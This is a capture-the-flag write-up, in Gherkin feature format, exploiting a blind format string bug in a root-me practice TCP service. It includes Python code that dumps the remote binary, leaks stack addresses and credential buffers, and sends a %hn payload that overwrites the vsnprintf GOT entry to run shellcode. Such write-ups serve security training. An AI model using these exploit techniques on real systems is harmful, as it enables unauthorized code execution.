## Version 2.0
## language: en

Feature: Blind-remote-format-string-bug
  Site:
    root-me
  Category:
    app-systeme
  User:
    m'baku
  Goal:
    Get shell and read the password

  Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Ubuntu          | 18.04.5   |
    | VMware          | 15.5.6    |
    | IDA             | 7.2       |
    | Netcat          | 1.18      |
    | Python          | 2.7       |
    | Windows         | 10        |

  Machine information:
    Given I am accessing the challenge through its URL
    When I visit the link
    Then I see a following description:
    """
    Network service attack without binary or source code
    """
    And what is provided is a host and a port to a TCP service
    """
    Host        challenge02.root-me.org
    Protocol    TCP
    Port        56003
    """ [evidences](connections.png)

  Scenario: Success: Analyzing the network service
    Given the source code is not provided nor the binary
    Then I analyze the network service looking for some bug
    And in normal use case I can enter a username and password
    Then a welcome message is displayed
    """
    Welcome to our network service! Type "quit" to return.
    """
    And when sending a text, the same text is sent back [evidences](normal.png)
    Then based on this behavior I tested if there is an FSB (Format String Bug)
    And it is effectively vulnerable to format string attack
    """
    $ nc challenge02.root-me.org 56003
    login: mbaku
    password: aaaaa
    Welcome to our network service! Type "quit" to return.
    aaaa
    aaaa
    %x
    8048625
    """ [evidences](fsb.png)
    And due to the response of the service: "8048625"
    Then I can determine that the binary's pointers are not mapped with PIE
    Then I checked for Buffer Overflows but apparently is not vulnerable to BoF
    And I can conclude that I only have 1 bug (FSB)

  Scenario: Fail: Dump the binary
    Given FSB allows to have a write and/or read primitive
    Then I can dump the whole binary
    And this is mainly possible because the binary has no PIE
    Then the text base address on 386 systems (Linux) is:
    """
    0x08048000
    """
    And I can use the "%s" format specifier to read the pointer data
    Then knowing how printf works
    """
    +-------+---------+
    |  %s   | pointer |
    +-------+---------+
    """
    Then I can't set this address in a standard way
    And this is because printf breaks with NULL bytes
    """
    char *buf = "hello\x00 world";
    printf("%s\n", buf);

    # hello <-- only this is printed
    """

  Scenario: Success: Dump the binary with padding
    Given I can't dump the binary by the NULL bytes
    Then to solve this I implement a padding to leave the address in the right
    And I maked a function to dump all the binary
    """
    def dump_binary():
        base = 0x8048000
        off = 0
        file = open("dump.raw", "wb")

        while True:
            address = base + off
            fmt = '|%265$s|' + 'AAAAA' + 'EOF' + struct.pack("<I", address)
            s.send(fmt + '\n')
            try:
                leak = recvuntil(s,'EOF').split('|')[1]
                print leak
            except EOFError:
                print "Bye byte"
                break
            leak += "\x00"
            off += len(leak)
            file.write(leak)
            file.flush()
    """ [evidences](duump.png)
    Then I got a binary, not functional, but disassemblable
    And with this I can find the GOT.PLT or more bugs: [evidences](dumped.png)
    """
    dump.raw: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV),
    corrupted program header size, corrupted section header size
    """

  Scenario: Success: Disassembling the binary
    Given I now have a binary with many corrupted segments but disassemblable
    Then I can open it with IDA [evidences](functions.png)(esp1k.png)
    And I realize that the user and password buffers are on the stack
    Then At this point I can think of two attack vectors
    """
    1. Leak all stack and point the return to a shellcode
    """
    Then analyzing this approach is more complex
    And this is because I don't know if the real binary doesn't have NX
    Then I thought of another more reliable vector
    """
    2. Leak all stack and overwrite any GOT pointer with a shellcode
    """
    And this is more reliable because the GOT will always have execution rights

  Scenario: Success: Leaking the crendetials buffers
    Given my idea is to put a shellcode in the password buffer
    Then I need to know the address of this buffer on the stack
    And for that I need to know which addresses the stack is mapped to
    Then I coded a for loop to get the correct stack address
    """
    for i in range(700):
        fmt = '%' + str(i + 1) + '$pEOF'
        p.sendline(fmt)
        print p.recvuntil('EOF')
    """
    And I got the following pointer: [evidences](stackaddress.png)
    """
    0xbffffd88EOF
    """
    Then it means that the stack pointers are mapped at "0xbffff000" addresses
    And with this I can dump the entire stack to locate the credential buffers
    """
    for i in range(0xbffff000, 0xbfffffff + 1):
    try:
        fmt = 'AAAA%265$sBBBB' + p16(0) + p32(i)
        p.sendline(fmt)
        p.recvuntil('AAAA')
        leak = p.recvuntil('BBBB').strip('BBBB')
        print hex(i), leak
    except:
        continue
    """ [evidences](passbuff.png)(userbuff.png)
    Then with this I was able to determine the user and password pointers
    """
    0xbffff96c -> usuario (mbaku)
    0xbffff97c -> password (AAAAAAAAAAAAAAAAAAAAAAA)
    """

  Scenario: Success: Exploiting the service
    Given the idea is to overwrite an entry to the GOT
    Then the idea is put the shellcode in any credential buffer
    And using the write primitive that the FSB gives us
    Then overwrite it with the address of the shellcode
    And I chose the GOT of the vsnprintf function [evidences](vsnprintfgot.png)
    Then it is only to send the correct payload and that's it
    """
    password_stack = 0xbffff97c
    vsnprintf_got = 0x804A020
    password_stack_string = "%x" % password_stack
    ho = int(password_stack_string[:4], 16) # high bytes
    lo = int(password_stack_string[4:], 16) # low bytes

    payload = ''
    payload += p32(vsnprintf_got + 2)
    payload += p32(vsnprintf_got)
    payload += '%' + str(ho - 8) + 'd%5$hn'
    payload += '%' + str(lo - ho) + 'd%6$hn'

    p.sendline(payload)
    """
    And voila, in this way I could exploit the service [evidences](flag.png)
